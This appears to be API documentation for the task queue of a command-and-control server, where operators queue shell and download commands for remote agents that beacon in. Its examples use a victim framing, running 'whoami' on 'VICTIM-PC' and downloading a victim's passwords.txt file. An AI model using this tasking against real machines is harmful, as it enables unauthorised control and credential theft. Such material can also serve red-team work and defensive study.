Overview

CommandQueue manages pending tasks for all agent sessions using asyncio queues. Each session has its own queue, and all tasks are persisted to the database for durability across server restarts.
Source: server/command_queue.py

TaskStatus Enum

class TaskStatus(str, Enum):
    PENDING    = 'PENDING'
    DISPATCHED = 'DISPATCHED'
    COMPLETE   = 'COMPLETE'
    ERROR      = 'ERROR'
Represents the lifecycle state of a task.
  • PENDING (str): Task queued, waiting to be sent to agent
  • DISPATCHED (str): Task sent to agent, awaiting result
  • COMPLETE (str): Task executed successfully, result stored
  • ERROR (str): Task execution failed or timed out
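Because TaskStatus mixes in str, its members behave like plain strings when compared, restored from storage, or serialized. The sketch below illustrates this with a copy of the enum; the is_terminal helper is hypothetical and is not part of command_queue.py.

```python
import json
from enum import Enum


class TaskStatus(str, Enum):
    PENDING = 'PENDING'
    DISPATCHED = 'DISPATCHED'
    COMPLETE = 'COMPLETE'
    ERROR = 'ERROR'


# Hypothetical helper: statuses after which a task is not dispatched again.
TERMINAL = {TaskStatus.COMPLETE, TaskStatus.ERROR}


def is_terminal(status: TaskStatus) -> bool:
    return status in TERMINAL


# Members compare equal to their string values.
same = TaskStatus.PENDING == 'PENDING'
# A stored string converts back to the matching member.
restored = TaskStatus('DISPATCHED')
# The str mixin lets json serialize the member as its value.
encoded = json.dumps({'status': TaskStatus.COMPLETE})
```

When formatting a status for display, prefer status.value: Python 3.12 changed how f-strings render str-mixin enum members, so the bare member may print as TaskStatus.COMPLETE rather than COMPLETE.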

Task Dataclass

@dataclass
class Task:
    task_id:    str
    session_id: str
    command:    str
    args:       list
    timeout_s:  int
    queued_at:  float
    status:     TaskStatus = TaskStatus.PENDING
Represents a single command task for an agent.
Fields:
  • task_id (str): Unique UUID for the task
  • session_id (str): UUID of the agent session this task belongs to
  • command (str): Command type: shell, download, upload, sleep, etc.
  • args (list): Command-specific arguments. Example: ["whoami"] for shell command
  • timeout_s (int): Maximum execution time in seconds before timeout
  • queued_at (float): Unix timestamp when task was queued
  • status (TaskStatus, default: PENDING): Current task status
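As a rough illustration of how these fields fit together, the sketch below builds a Task and flattens it into a dict suitable for a database row. The new_task and to_row helpers are hypothetical names introduced for this example; the actual persistence format used by Database is not documented here.

```python
import time
import uuid
from dataclasses import asdict, dataclass
from enum import Enum


class TaskStatus(str, Enum):
    PENDING = 'PENDING'
    DISPATCHED = 'DISPATCHED'
    COMPLETE = 'COMPLETE'
    ERROR = 'ERROR'


@dataclass
class Task:
    task_id: str
    session_id: str
    command: str
    args: list
    timeout_s: int
    queued_at: float
    status: TaskStatus = TaskStatus.PENDING


def new_task(session_id: str, command: str, args: list, timeout_s: int) -> Task:
    """Hypothetical factory: fills in task_id and queued_at automatically."""
    return Task(
        task_id=str(uuid.uuid4()),
        session_id=session_id,
        command=command,
        args=list(args),          # copy so later caller mutations do not leak in
        timeout_s=timeout_s,
        queued_at=time.time(),
    )


def to_row(task: Task) -> dict:
    """Hypothetical serializer: a plain dict with the status as a string."""
    row = asdict(task)
    row['status'] = task.status.value
    return row
```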

CommandQueue Class

Constructor

def __init__(self)
Initializes an empty command queue with an asyncio lock.
Internal State:
self._queues: dict[str, asyncio.Queue] = {}  # session_id -> Queue[Task]
self._tasks:  dict[str, Task]          = {}  # task_id -> Task (for O(1) lookup)
self._lock = asyncio.Lock()
Architecture:
  • One asyncio.Queue per session for FIFO task ordering
  • Flat task registry for fast lookups by task_id
  • Lock serializing access from concurrent coroutines (asyncio.Lock is not thread-safe; it only coordinates tasks on one event loop)
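To make the role of the lock concrete, here is a minimal sketch of lazy per-session queue creation guarded by an asyncio.Lock. QueueRegistry and queue_for are hypothetical names for illustration; the real class may organize this differently.

```python
import asyncio


class QueueRegistry:
    """Hypothetical reduction of CommandQueue to its queue bookkeeping."""

    def __init__(self):
        self._queues = {}            # session_id -> asyncio.Queue
        self._lock = asyncio.Lock()

    async def queue_for(self, session_id: str) -> asyncio.Queue:
        # Holding the lock keeps the check-then-create step atomic with
        # respect to other coroutines on the same event loop.
        async with self._lock:
            queue = self._queues.get(session_id)
            if queue is None:
                queue = asyncio.Queue()
                self._queues[session_id] = queue
            return queue


async def demo():
    registry = QueueRegistry()
    # Five concurrent requests for the same session share one queue.
    queues = await asyncio.gather(*(registry.queue_for('s1') for _ in range(5)))
    return all(q is queues[0] for q in queues), len(registry._queues)
```

Calling asyncio.run(demo()) should show that all five coroutines received the same queue object and that only one queue was created.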

Methods

enqueue_task()

async def enqueue_task(self, session_id: str, command: str, args: list,
                       timeout_s: int, db: Database) -> str
Create a Task, add to session queue, persist to DB, return task_id.
Parameters:
  • session_id (str, required): UUID of the agent session to receive this task
  • command (str, required): Command type: shell, download, upload, sleep, etc.
  • args (list, required): Command-specific arguments
  • timeout_s (int, required): Maximum execution time in seconds
  • db (Database, required): Database instance for persistence
Returns:
  • str: Newly created task_id (UUID)
Example:
from server.command_queue import CommandQueue
from server.storage import Database

async with Database() as db:
    cq = CommandQueue()
    
    # Queue a shell command
    task_id = await cq.enqueue_task(
        session_id='550e8400-e29b-41d4-a716-446655440000',
        command='shell',
        args=['whoami'],
        timeout_s=30,
        db=db
    )
    print(f"Task queued: {task_id}")
    
    # Queue a file download
    task_id2 = await cq.enqueue_task(
        session_id='550e8400-e29b-41d4-a716-446655440000',
        command='download',
        args=['C:\\Users\\jdoe\\passwords.txt'],
        timeout_s=60,
        db=db
    )
Behavior:
  • Generates new UUID for task_id
  • Sets queued_at to current time
  • Sets status to PENDING
  • Adds task to session’s queue (creates queue if needed)
  • Stores task in flat registry
  • Persists to database
  • Logs enqueue event
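The behavior listed above can be sketched roughly as follows. This is not the actual implementation: InMemoryDB and its insert_task method are hypothetical stand-ins for Database, the status is a plain string rather than TaskStatus, and logging is omitted.

```python
import asyncio
import time
import uuid
from dataclasses import dataclass


@dataclass
class Task:
    task_id: str
    session_id: str
    command: str
    args: list
    timeout_s: int
    queued_at: float
    status: str = 'PENDING'  # simplified; the real class uses TaskStatus


class InMemoryDB:
    """Hypothetical stand-in for Database; insert_task is an assumed name."""

    def __init__(self):
        self.tasks = {}

    async def insert_task(self, task: Task) -> None:
        self.tasks[task.task_id] = task


class MiniCommandQueue:
    def __init__(self):
        self._queues = {}
        self._tasks = {}
        self._lock = asyncio.Lock()

    async def enqueue_task(self, session_id, command, args, timeout_s, db):
        task = Task(str(uuid.uuid4()), session_id, command,
                    list(args), timeout_s, time.time())
        async with self._lock:
            queue = self._queues.get(session_id)
            if queue is None:                      # create queue on first use
                queue = self._queues[session_id] = asyncio.Queue()
            queue.put_nowait(task)                 # FIFO order per session
            self._tasks[task.task_id] = task       # flat registry for lookups
        await db.insert_task(task)                 # persist for restarts
        return task.task_id


async def demo():
    db = InMemoryDB()
    cq = MiniCommandQueue()
    first = await cq.enqueue_task('s1', 'sleep', ['5'], 30, db)
    second = await cq.enqueue_task('s1', 'sleep', ['10'], 30, db)
    queue = cq._queues['s1']
    order = [queue.get_nowait().task_id for _ in range(queue.qsize())]
    return order == [first, second], len(db.tasks)
```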

peek_task()

async def peek_task(self, session_id: str, db: Database = None) -> Task | None
Return the next PENDING task for a session without removing it from the queue.
Parameters:
  • session_id (str, required): UUID of the agent session
  • db (Database, optional): Optional database instance. If provided, checks DB for tasks not yet loaded into memory.
Returns:
  • Task | None: Next PENDING task if available, None if queue is empty
Example:
# Agent polls for next task
task = await cq.peek_task(session_id, db=db)

if task:
    print(f"Dispatching: {task.command} {task.args}")
    await cq.mark_dispatched(task.task_id, db)
else:
    print("No pending tasks")
Behavior:
  1. Memory Check: Searches in-memory queue for PENDING tasks
  2. Database Fallback: If no task in memory and db provided, queries database
  3. Lazy Load: If task found in DB, loads into memory and adds to queue
  4. Non-Destructive: Task remains in queue until status changes
Use Case: After a server restart, tasks persisted in the DB are loaded into memory on the first peek that passes db.
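The four steps above might look like the sketch below. Note one deliberate substitution: asyncio.Queue has no public peek operation, so this sketch stores tasks in a collections.deque instead; how the real class inspects its queues is not shown in this page. InMemoryDB and get_pending_tasks are hypothetical names.

```python
import asyncio
from collections import deque
from dataclasses import dataclass


@dataclass
class Task:
    task_id: str
    session_id: str
    status: str = 'PENDING'


class InMemoryDB:
    """Hypothetical stand-in for Database."""

    def __init__(self, rows):
        self.rows = rows

    async def get_pending_tasks(self, session_id):
        return [t for t in self.rows
                if t.session_id == session_id and t.status == 'PENDING']


class PeekableQueue:
    def __init__(self):
        self._queues = {}   # session_id -> deque of Task (swap for asyncio.Queue)
        self._tasks = {}    # task_id -> Task

    def _first_pending(self, session_id):
        for task in self._queues.get(session_id, ()):
            if task.status == 'PENDING':
                return task
        return None

    async def peek_task(self, session_id, db=None):
        task = self._first_pending(session_id)          # 1. memory check
        if task is not None or db is None:
            return task
        for row in await db.get_pending_tasks(session_id):  # 2. DB fallback
            if row.task_id not in self._tasks:               # 3. lazy load
                self._tasks[row.task_id] = row
                self._queues.setdefault(session_id, deque()).append(row)
        return self._first_pending(session_id)          # 4. nothing is removed


async def demo():
    db = InMemoryDB([Task('t1', 's1'), Task('t2', 's1')])
    cq = PeekableQueue()                     # empty, as after a restart
    first = await cq.peek_task('s1', db=db)
    again = await cq.peek_task('s1', db=db)  # same task: peek is non-destructive
    first.status = 'DISPATCHED'
    nxt = await cq.peek_task('s1', db=db)
    unknown = await cq.peek_task('missing', db=db)
    return first.task_id, again is first, nxt.task_id, unknown
```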

mark_dispatched()

async def mark_dispatched(self, task_id: str, db: Database) -> None
Set task status to DISPATCHED in memory and in DB.
Parameters:
  • task_id (str, required): UUID of the task to mark dispatched
  • db (Database, required): Database instance for persistence
Example:
task = await cq.peek_task(session_id, db=db)
if task:
    # Send task to agent via beacon response
    await cq.mark_dispatched(task.task_id, db)
Behavior:
  • Updates task.status = TaskStatus.DISPATCHED in memory
  • Persists to database
  • Logs dispatch event
  • Next peek_task() call will skip this task (no longer PENDING)

mark_complete()

async def mark_complete(self, task_id: str, result: dict,
                        db: Database) -> None
Set task status to COMPLETE, persist result to DB.
Parameters:
  • task_id (str, required): UUID of the completed task
  • result (dict, required): Task execution result containing:
      • stdout: Command standard output
      • stderr: Command standard error
      • exit_code: Process exit code
      • duration_ms: Execution duration in milliseconds
  • db (Database, required): Database instance for persistence
Example:
# Agent submits task result
result = {
    'stdout': 'VICTIM-PC\\jdoe',
    'stderr': '',
    'exit_code': 0,
    'duration_ms': 42
}

await cq.mark_complete(task_id, result, db)

# Result now available via CLI or web UI
Behavior:
  • Updates task.status = TaskStatus.COMPLETE in memory
  • Persists status to database
  • Inserts result row into database with generated result_id
  • Logs completion with exit_code
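As an illustration of the "result row with generated result_id" step, the following sketch validates the four documented result keys and builds a row. build_result_row and the row layout are assumptions made for this example; the actual schema lives in the Database module.

```python
import uuid

# The four keys documented for the result dict.
REQUIRED_KEYS = ('stdout', 'stderr', 'exit_code', 'duration_ms')


def build_result_row(task_id: str, result: dict) -> dict:
    """Hypothetical helper: check the payload and attach a fresh result_id."""
    missing = [key for key in REQUIRED_KEYS if key not in result]
    if missing:
        raise ValueError(f"result is missing keys: {', '.join(missing)}")
    row = {'result_id': str(uuid.uuid4()), 'task_id': task_id}
    row.update({key: result[key] for key in REQUIRED_KEYS})
    return row
```

Rejecting incomplete payloads before writing anything keeps the task status and the stored result consistent with each other.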

mark_error()

async def mark_error(self, task_id: str, db: Database) -> None
Set task status to ERROR in memory and in DB.
Parameters:
  • task_id (str, required): UUID of the failed task
  • db (Database, required): Database instance for persistence
Example:
# Agent reports task timeout or execution failure
await cq.mark_error(task_id, db)
Behavior:
  • Updates task.status = TaskStatus.ERROR in memory
  • Persists to database
  • Logs error event
Use Cases:
  • Task timeout on agent
  • Command execution failure
  • Agent crash during execution

get_tasks_for_session()

async def get_tasks_for_session(self, session_id: str) -> list[Task]
Return all in-memory tasks for a session ordered by queued_at.
Parameters:
  • session_id (str, required): UUID of the agent session
Returns:
  • list[Task]: List of Task objects sorted by queued_at ascending (oldest first)
Example:
tasks = await cq.get_tasks_for_session(session_id)

for task in tasks:
    status_icon = {
        TaskStatus.PENDING: '⏳',
        TaskStatus.DISPATCHED: '📤',
        TaskStatus.COMPLETE: '✓',
        TaskStatus.ERROR: '✗'
    }[task.status]
    
    # Use .value: Python 3.12+ formats str-mixin enum members as 'TaskStatus.X'
    print(f"{status_icon} {task.command} {task.args} - {task.status.value}")
Output:
✓ shell ['whoami'] - COMPLETE
📤 download ['C:\\passwords.txt'] - DISPATCHED
⏳ shell ['ipconfig'] - PENDING
Use Cases:
  • CLI tasks command
  • Web UI task history
  • Operator monitoring
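The lookup itself can be pictured as a filter over the flat task registry followed by a sort. A minimal sketch, assuming a task_id -> Task dict like self._tasks (the function name tasks_for_session is hypothetical):

```python
from dataclasses import dataclass


@dataclass
class Task:
    task_id: str
    session_id: str
    queued_at: float


def tasks_for_session(registry: dict, session_id: str) -> list:
    """Filter the flat registry by session, oldest task first."""
    matching = (t for t in registry.values() if t.session_id == session_id)
    return sorted(matching, key=lambda t: t.queued_at)


registry = {
    'c': Task('c', 's1', 30.0),
    'a': Task('a', 's1', 10.0),
    'x': Task('x', 's2', 5.0),
    'b': Task('b', 's1', 20.0),
}
ordered_ids = [t.task_id for t in tasks_for_session(registry, 's1')]
```

Only tasks already in memory are considered, so tasks that exist solely in the database after a restart will not appear until they are loaded.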

Usage Patterns

Complete Task Lifecycle

async with Database() as db:
    cq = CommandQueue()
    
    # Operator queues command via CLI
    task_id = await cq.enqueue_task(
        session_id=session_id,
        command='shell',
        args=['whoami'],
        timeout_s=30,
        db=db
    )
    
    # Agent beacons and pulls task
    task = await cq.peek_task(session_id, db=db)
    if task:
        # Server sends task to agent
        await cq.mark_dispatched(task.task_id, db)
    
    # Agent executes and returns result
    result = {
        'stdout': 'VICTIM-PC\\jdoe',
        'stderr': '',
        'exit_code': 0,
        'duration_ms': 42
    }
    await cq.mark_complete(task_id, result, db)
    
    # Operator views results
    tasks = await cq.get_tasks_for_session(session_id)
    if any(t.status == TaskStatus.COMPLETE for t in tasks):
        # Fetch results from the database once, rather than once per task
        results = await db.get_results_for_session(session_id)
        for r in results:
            print(r['stdout'])

Error Handling

# Agent timeout
if task_duration > task.timeout_s:
    await cq.mark_error(task_id, db)

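# Agent crash detection (server-side)
# Task has no dispatch timestamp, and queued_at predates dispatch, so this
# overestimates time in flight; only consider tasks that were dispatched.
if (task.status == TaskStatus.DISPATCHED
        and time.time() - task.queued_at > task.timeout_s * 2):
    # Task dispatched but no result received
    await cq.mark_error(task_id, db)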
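A periodic server-side check is more precise if the dispatch time is recorded separately. The sketch below assumes a hypothetical dispatched_at timestamp, which the Task dataclass on this page does not have, and returns the IDs that a sweeper could then pass to mark_error().

```python
from dataclasses import dataclass


@dataclass
class InFlight:
    task_id: str
    timeout_s: int
    dispatched_at: float  # hypothetical field, not part of Task


def find_stale(in_flight: list, now: float, grace: float = 2.0) -> list:
    """Return IDs of tasks in flight for longer than timeout_s * grace."""
    return [
        t.task_id
        for t in in_flight
        if now - t.dispatched_at > t.timeout_s * grace
    ]


in_flight = [
    InFlight('a', timeout_s=30, dispatched_at=1000.0),
    InFlight('b', timeout_s=30, dispatched_at=1050.0),
]
stale = find_stale(in_flight, now=1061.0)  # 'a' has been in flight for 61 s
```

Passing now explicitly keeps the function deterministic and easy to test; a real sweeper would supply time.time().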

Queue Priority

Tasks are dispatched in FIFO order per session:
# Queue multiple tasks
await cq.enqueue_task(sid, 'shell', ['whoami'], 30, db)
await cq.enqueue_task(sid, 'shell', ['hostname'], 30, db)
await cq.enqueue_task(sid, 'shell', ['ipconfig'], 30, db)

# peek_task() always returns oldest PENDING task
task1 = await cq.peek_task(sid, db)  # Returns 'whoami'
await cq.mark_dispatched(task1.task_id, db)

task2 = await cq.peek_task(sid, db)  # Returns 'hostname'
await cq.mark_dispatched(task2.task_id, db)

task3 = await cq.peek_task(sid, db)  # Returns 'ipconfig'

Integration Points

Server Main

Used in server_main.py beacon handlers:
from server.command_queue import CommandQueue

cmd_queue = CommandQueue()

# Task pull handler
task = await cmd_queue.peek_task(session_id, db=db)
if task:
    await cmd_queue.mark_dispatched(task.task_id, db)
    return task_dispatch_response(task)

# Task result handler
await cmd_queue.mark_complete(task_id, result_payload, db)

CLI Commands

Used in cli/task_commands.py:
# Queue new task
task_id = await cmd_queue.enqueue_task(
    session_id, command, args, timeout_s, db
)

# View task history
tasks = await cmd_queue.get_tasks_for_session(session_id)
for task in tasks:
    display_task(task)

Testing

Self-Test Suite

Run built-in tests:
python -m server.command_queue
Test Coverage:
  • enqueue_task generates valid UUID
  • peek_task returns PENDING task
  • peek_task is non-destructive
  • mark_dispatched excludes task from future peeks
  • mark_complete stores result in DB
  • get_tasks_for_session ordering
  • peek_task returns None for unknown session
  • mark_error sets ERROR status
Output:
Running command_queue self-test...
  [OK] enqueue_task
  [OK] peek_task returns PENDING task
  [OK] peek_task is non-destructive
  [OK] mark_dispatched
  [OK] mark_complete
  [OK] get_tasks_for_session ordering
  [OK] peek_task returns None for unknown session
  [OK] mark_error

All command_queue self-tests passed.

Performance Considerations

  • All queued and in-flight tasks are held in memory. 10,000 tasks consume roughly 5-10 MB of RAM.
  • enqueue_task and peek_task are O(1) for in-memory operations. The database fallback in peek_task adds query latency.
  • Completed tasks remain in memory indefinitely. Consider periodic cleanup for long-running operations.
  • A single lock protects all queues, so high task throughput may cause contention. Consider per-session locks for scaling.
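Neither periodic cleanup nor per-session locking is described as implemented, so the following is only a sketch of what the two suggestions could look like. prune_finished and SessionLocks are hypothetical names, and age is measured from queued_at because no completion timestamp is documented.

```python
import asyncio
from collections import defaultdict
from dataclasses import dataclass

TERMINAL = {'COMPLETE', 'ERROR'}


@dataclass
class Task:
    task_id: str
    session_id: str
    queued_at: float
    status: str


def prune_finished(tasks: dict, now: float, max_age_s: float) -> int:
    """Drop finished tasks older than max_age_s; return how many were removed."""
    stale = [tid for tid, t in tasks.items()
             if t.status in TERMINAL and now - t.queued_at > max_age_s]
    for tid in stale:
        del tasks[tid]
    return len(stale)


class SessionLocks:
    """One asyncio.Lock per session, created lazily on first use."""

    def __init__(self):
        self._locks = defaultdict(asyncio.Lock)

    def for_session(self, session_id: str) -> asyncio.Lock:
        return self._locks[session_id]


async def demo():
    locks = SessionLocks()
    async with locks.for_session('s1'):
        # Holding the lock for s1 does not block work on s2.
        other_free = not locks.for_session('s2').locked()
        same_held = locks.for_session('s1').locked()
    return other_free, same_held
```

Pruned tasks would still be available from the database, so cleanup trades memory for an extra query when old history is requested.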

Logging

Structured logging with contextual fields:
logger.info('task enqueued', extra={
    'session_id': session_id,
    'task_id':    task.task_id,
    'command':    command,
})
Events:
  • Task enqueued
  • Task loaded from DB
  • Task dispatched
  • Task complete
  • Task error
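Fields passed through extra become attributes on the LogRecord, but the default formatter does not print them. One way to surface them is a small JSON formatter; the sketch below uses only the standard logging module, and JsonFormatter, make_logger, and the logger name are hypothetical.

```python
import io
import json
import logging


class JsonFormatter(logging.Formatter):
    """Emit the message plus any of the contextual fields that are present."""

    FIELDS = ('session_id', 'task_id', 'command')

    def format(self, record: logging.LogRecord) -> str:
        payload = {'level': record.levelname, 'message': record.getMessage()}
        for field in self.FIELDS:
            if hasattr(record, field):       # set via logger.info(..., extra={})
                payload[field] = getattr(record, field)
        return json.dumps(payload)


def make_logger(stream) -> logging.Logger:
    logger = logging.getLogger('command_queue_demo')
    logger.setLevel(logging.INFO)
    logger.propagate = False                 # keep demo output off the root logger
    logger.handlers.clear()
    handler = logging.StreamHandler(stream)
    handler.setFormatter(JsonFormatter())
    logger.addHandler(handler)
    return logger


stream = io.StringIO()
log = make_logger(stream)
log.info('task enqueued', extra={'session_id': 's1', 'task_id': 't1', 'command': 'sleep'})
logged = json.loads(stream.getvalue())
```

Keys in extra must not collide with built-in LogRecord attributes such as message or args, or logging raises a KeyError.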
